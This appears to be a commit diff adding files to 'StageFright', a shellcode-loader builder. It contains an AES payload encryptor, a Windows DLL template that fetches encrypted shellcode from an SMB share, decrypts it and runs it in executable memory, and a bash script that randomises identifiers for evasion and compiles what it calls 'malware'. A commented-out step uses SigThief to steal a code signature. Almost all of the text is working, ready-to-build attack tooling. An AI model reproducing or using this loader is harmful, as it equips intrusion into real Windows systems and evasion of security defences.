Add files via upload

StageFright/StageFright/StageFright/SMBDLL/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/SMBDLL/Resources/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL ohztCLrjKceS(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL EpKOpQRlB(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int rABIYwtsiD(char* Random4, unsigned int zHUdE, char* nPincKr, size_t nPincKrlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)nPincKr, (DWORD)nPincKrlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &zHUdE)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char VTOBIBvhNOZy[] =  { 0xa4, 0x49, 0xc1, 0x91, 0xfc, 0x7a, 0x55, 0x44, 0x92, 0x9a, 0xab, 0x5d, 0xb, 0x95, 0x2e, 0xd6 };
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    LPCWSTR szServer = L"Win11Blue";
+    LPCWSTR szFilePath = L"Shared\\invoice.txt";
+
+    PBYTE ymluXTmiPBZPy;
+    SIZE_T ymluXTmiPBZPySize;
+
+    BOOL success = ohztCLrjKceS(szServer, szFilePath, &ymluXTmiPBZPy, &ymluXTmiPBZPySize);
+
+    if (success) {
+        rABIYwtsiD((char*)ymluXTmiPBZPy, ymluXTmiPBZPySize, VTOBIBvhNOZy, sizeof(VTOBIBvhNOZy));
+
+        success = EpKOpQRlB(ymluXTmiPBZPy, ymluXTmiPBZPySize);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = ymluXTmiPBZPySize;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&ymluXTmiPBZPy,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(ymluXTmiPBZPy);
+    }
+
+    return success ? 0 : 1;
+}
+

StageFright/StageFright/StageFright/SMBDLL/SMBDLL.sh

@@ -0,0 +1,180 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"          
+
+ _____ _                       _   ________  _________  ______ _      _     
+/  ___| |                     | | /  ___|  \/  || ___ \ |  _  \ |    | |    
+\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ / | | | | |    | |    
+ `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \ | | | | |    | |    
+/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ / | |/ /| |____| |____
+\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/  |___/ \_____/\_____/
+                 __/ |                                                      
+                |___/                                                       
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
+echo ""
+read HOSTNAME
+echo ""
+echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
+echo ""
+read SHAREFOLDER
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Entry Point Function"${clear}
+echo ""
+read ENTRYPOINT
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/SMBDLL/template.cpp StageFright/SMBDLL/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/SMBDLL/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/SMBDLL/conv.py StageFright/SMBDLL/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/SMBDLL/Resources/con.py
+sed -i "s/;//g" -i StageFright/SMBDLL/Resources/con.py
+python3 StageFright/SMBDLL/Resources/con.py
+#rm StageFright/SMBDLL/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/SMBDLL/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMBDLL/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMBDLL/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/SMBDLL/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/SMBDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/SMBDLL/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/SMBDLL/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/SMBDLL/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/SMBDLL/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/SMBDLL/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/SMBDLL/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/SMBDLL/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/SMBDLL/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/SMBDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+#echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+#echo ""
+#sleep 2
+#python3 StageFright/StageFright/ResourcesSigThief/sigthief.py -i StageFright/StageFright/SMBDLL/Resources/OfficeSetup.exe #-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+#mv signed$MALWARE $MALWARE
+#echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+#echo ""
+
+

StageFright/StageFright/StageFright/SMBDLL/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

StageFright/StageFright/StageFright/SMBDLL/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random7[] = KEYVALUE
+
+extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    LPCWSTR szServer = L"HOSTNAME";
+    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
+
+    PBYTE Random8;
+    SIZE_T Random8Size;
+
+    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
+
+    if (success) {
+        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
+
+        success = Random2(Random8, Random8Size);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = Random8Size;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&Random8,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(Random8);
+    }
+
+    return success ? 0 : 1;
+}
+